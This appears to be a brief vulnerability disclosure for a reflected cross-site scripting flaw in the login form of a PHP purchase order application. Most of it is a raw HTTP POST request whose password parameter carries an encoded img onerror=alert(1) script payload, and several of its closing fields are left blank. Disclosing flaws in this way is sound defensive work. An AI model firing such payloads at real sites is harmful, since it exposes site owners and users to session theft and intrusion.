Purchase Order Management-1.0 - XSS-Reflected - Information-gathering
Vendor
Description:
The value of the password request parameter is copied into the HTML document as plain text between tags. The payload uay4ws4m6g was submitted in the password parameter. This input was echoed unmodified in the application's response.
STATUS: HIGH Vulnerability
[+]Exploit:
POST /purchase_order/classes/Login.php?f=login HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Referer: http://localhost/purchase_order/admin/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 37
username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g
Reproduce:
Proof and Exploit:
Time spend:
00:15:00
